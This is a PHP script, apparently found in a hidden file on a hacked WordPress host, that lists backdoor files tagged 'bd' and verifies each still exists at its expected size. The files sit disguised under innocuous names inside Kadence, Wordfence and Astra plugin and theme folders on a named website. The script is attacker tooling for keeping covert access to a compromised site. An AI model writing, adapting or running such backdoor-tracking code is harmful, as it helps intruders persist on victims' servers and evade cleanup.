File: //dev/shm/.dat
<?php $r = '/home/jourupex/levelupwellnesshub.com'; $x = ["/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/licensing-api-client/src/Responses/License/Listing/ValueObjects/Class.php"=>"bd@@132642@@1041",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/harbor/src/Harbor/Cron/Actions/Handle.Unschedule.Cron.Data.Refresh.php"=>"bd@@143922@@996",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/export.php"=>"bd@@144995@@931",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/View/Exceptions/checklogin.php"=>"bd@@148354@@979",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/monolog/monolog/src/Monolog/Attribute/file_manager.php"=>"bd@@134788@@956",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/licensing-api-client/src/Requests/License/Alias/ValueObjects/libraryEN.php"=>"bd@@141486@@945",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/telemetry/src/Telemetry/Events/webdb_views.php"=>"bd@@135868@@1035",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/telemetry/src/Telemetry/Data_Providers/Null.Data.php"=>"bd@@136130@@805",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/Components/lang_fi.php"=>"bd@@148438@@1002",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/symfony/http-foundation/Session/Flash/reset.php"=>"bd@@145367@@1050",
"/wp-content/plugins/seo-1779185495/custom.file.5.1779185495.php"=>"bd@@129247@@846",
"/wp-content/plugins/kadence-blocks/vendor/vendor-prefixed/stellarwp/harbor/src/Harbor/View/WordPress.php"=>"bd@@145123@@831",
"/wp-content/plugins/kadence-starter-templates/vendor/vendor-prefixed/monolog/monolog/src/Monolog/Attribute/multisite.php"=>"bd@@148456@@1038",
"/wp-content/themes/astra/inc/builder/type/header/woo-cart/dynamic-css/lrscan.php"=>"bd@@148463@@896"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');